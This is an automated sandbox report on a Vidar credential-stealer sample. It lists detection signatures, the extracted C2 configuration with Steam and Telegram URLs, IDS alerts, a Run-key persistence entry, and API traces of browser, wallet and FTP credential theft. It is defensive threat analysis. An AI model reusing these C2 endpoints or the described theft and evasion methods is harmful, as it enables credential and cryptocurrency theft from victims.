Windows Analysis Report
7ZthFNAqYp.exe

Overview

General Information

Sample name: 7ZthFNAqYp.exe (renamed because original name is a hash value)
Original sample name: 6733924c670207ed7755dc0fe2286c36.exe
Analysis ID: 1539807
MD5: 6733924c670207ed7755dc0fe2286c36
SHA1: 2fea9c1b0c3b0a923232dbcadcfc661bb08031d0
SHA256: a555018ed03a0b191f64f625b75cebd9f62c194c7b1c1a66b91266f2f1c1b6c4
Tags: 32, exe, trojan

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 7ZthFNAqYp.exe (PID: 3536 cmdline: "C:\Users\user\Desktop\7ZthFNAqYp.exe" MD5: 6733924C670207ED7755DC0FE2286C36)
    • 7ZthFNAqYp.exe (PID: 6484 cmdline: "C:\Users\user\Desktop\7ZthFNAqYp.exe" MD5: 6733924C670207ED7755DC0FE2286C36)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/fun88rockskek"], "Botnet": "65158feadb3cebfa5c9a9e36f0d461fe"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

Source | Rule | Description | Author | Strings
0.2.7ZthFNAqYp.exe.27e0000.5.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.7ZthFNAqYp.exe.27e0000.5.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
0.2.7ZthFNAqYp.exe.833b9e.3.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\7ZthFNAqYp.exe, ProcessId: 3536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AttoDesignerEditor
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-23T07:03:10.116209+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49989 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:11.614777+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49990 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:13.666136+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49991 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:15.274549+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49992 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:16.883942+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49993 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:18.571787+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49994 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:19.790589+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49995 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:26.679279+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49997 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:40.979719+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50000 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:43.236395+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50001 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:45.076079+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50002 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:47.374464+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50003 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:49.523853+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50004 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:51.569193+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50005 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:53.515354+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50006 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:55.459525+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50007 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:58.412343+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50008 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:59.700362+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50009 | 95.217.220.103 | 443 | TCP
2024-10-23T07:04:01.246503+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50010 | 95.217.220.103 | 443 | TCP
2024-10-23T07:04:02.819275+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50011 | 95.217.220.103 | 443 | TCP
2024-10-23T07:04:04.926276+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50012 | 95.217.220.103 | 443 | TCP
2024-10-23T07:04:07.550843+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50013 | 95.217.220.103 | 443 | TCP
2024-10-23T07:04:09.179772+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 50014 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:15.971660+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 95.217.220.103 | 443 | 192.168.2.6 | 49992 | TCP
2024-10-23T07:03:17.565702+0200 | 2051831 | 1 | Malware Command and Control Activity Detected | 95.217.220.103 | 443 | 192.168.2.6 | 49993 | TCP
2024-10-23T07:03:17.565183+0200 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.6 | 49993 | 95.217.220.103 | 443 | TCP

AV Detection

Source: 7ZthFNAqYp.exe, Avira: detected
Source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/fun88rockskek"], "Botnet": "65158feadb3cebfa5c9a9e36f0d461fe"}
Source: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe, ReversingLabs: Detection: 15%
Source: 7ZthFNAqYp.exe, ReversingLabs: Detection: 44%
Source: 7ZthFNAqYp.exe, Virustotal: Detection: 44%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_009280A1 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_00928048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_00931E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_0092A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB044C0 PK11_PubEncrypt
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CAD4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB04440 PK11_PrivDecrypt
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CAEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CAE8670 PK11_ExportEncryptedPrivKeyInfo
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB0A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB2A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB30180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB043B0 PK11_PubEncryptPKCS1,PR_SetError
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB27C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB2BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CAE7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB29EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_6CB03FF0 PK11_PrivDecryptPKCS1

Compliance

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Unpacked PE file: 2.2.7ZthFNAqYp.exe.20020000.4.unpack
Source: 7ZthFNAqYp.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49940 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: freebl3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source: Binary string: freebl3.pdbp source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source: Binary string: nss3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: softokn3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
Source: Binary string: nss3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\dev\sw\hbautil\source\windows\bench32\Release\Bench32.exe.pdb source: 7ZthFNAqYp.exe, AttoConvertVideo.exe.0.dr
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_00936013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_00929CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_0093547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_0092D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_00921D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_0092B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_00934D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_0092BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_0092B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_00935B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_0092CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 2_2_00935182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 4x nop then mov eax, dword ptr fs:[00000030h] (2_2_009214AD)
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe, Code function: 4x nop then mov dword ptr [ebp-04h], eax (2_2_009214AD)

Networking

Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49993 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.220.103:443 -> 192.168.2.6:49993
Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.220.103:443 -> 192.168.2.6:49992
Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199786602107
Source: Malware configuration extractor, URLs: https://t.me/fun88rockskek
Source: global traffic, HTTP traffic detected: GET /fun88rockskek HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Host: 107.191.36.218 | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 23.192.247.89
Source: Joe Sandbox View, IP Address: 149.154.167.99
Source: Joe Sandbox View, ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
Source: Joe Sandbox View, ASN Name: TELEGRAMRU
Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49990 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49992 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49994 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49989 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49991 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49995 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50000 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50002 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50001 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50003 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49997 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49993 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50004 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50006 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50007 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50005 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50008 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50010 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50011 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50013 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50014 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50009 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50012 -> 95.217.220.103:443
